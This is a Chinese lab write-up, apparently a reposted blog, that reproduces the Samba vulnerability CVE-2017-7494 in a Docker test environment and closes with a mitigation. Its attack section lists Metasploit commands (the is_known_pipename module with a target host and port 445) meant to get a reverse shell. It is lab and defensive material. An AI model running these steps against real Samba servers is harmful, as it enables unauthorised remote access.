三、漏洞编号为CVE-2017-7494的复现(永恒之蓝)(Linux)(Ubuntu16.04.4)

本文阅读 2 分钟
首页 代码,C/C#/C++ 正文

一、漏洞分析

1.漏洞别名: CVE-2017-7494称为Linux版的永恒之蓝 2.漏洞用来做什么: 该漏洞用来,远程反弹shell并提权 3.漏洞适合的环境: Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。 //也就是Samba 3.5.0之后的所有版本,在4.6.4/4.5.10/4.4.14修复了这个漏洞。

二、漏洞环境复现

1.相关信息: ①IP地址跟版本:

②靶机:

③攻击机:

2.环境搭建过程: ①选择原始快照1img ②把靶机环境的附件拷贝到qwsn目录下CVE-2017-7494

img ③把用户qwsn加入到doker组中:sudo usermod qwsn -g docker //为了之后的环境运行 img ④下载docker:sudo apt-get install docker img ⑤下载docker-compose:sudo apt-get install docker-compose img ⑥进入到CVE-2017-7494目录下,执行docker-compose up -d,开始运行测试环境: //这条命令是下载samba的环境,并且会同时开启samba服务

cd  /home/qwsnCVE-2017-7494
docker-compose  up  -d

img //注意,若报如下的错误:那么我们刚刚把qwsn加入到组后,还要再再重新登录该用户,即可。 img

⑦测试环境运行后,查看端口状态:docker ps -a img ⑧如⑦中所示,测试环境运行后,445端口开启了。

⑨在本机测试一下我们的环境: 安装smbclient,sudo apt-get install smbclient img 用本地连接测试:smbclient //127.0.0.1/myshare -N img

3.攻击过程: ①打开KALI2.0,开启终端terminal img ②进入msfconsole: msfconsole img ③use expolit/linux/samba/is_known_pipename ④set rhosts 192.168.97.104 ⑤set rport 445 ⑥run img ⑦在kali2.0上验证: img

三、注意:

1.重启靶机后,要重新执行该命令:docker-compose up -d //为了重启服务,开启测试环境

四、怎么预防这个漏洞呢? 1.你可以升级samba为4.6.4/4.5.10/4.4.14着三个版本中的一个 2.不过最简单的,就是在/home/docker/CVE-2017-7494这个目录下编辑sbm.conf 在【global】下一行,输入 nt pipe support = no ,即可! img 3.kali2.0验证一下: img

四、总结:
在这里插入图片描述
//如图所示,反弹Shell失败

1.感觉缺点东西,无能为力!!!

你以为的极限只是别人的开始
                                                                                                    2019-10-14---404
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/102565002
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复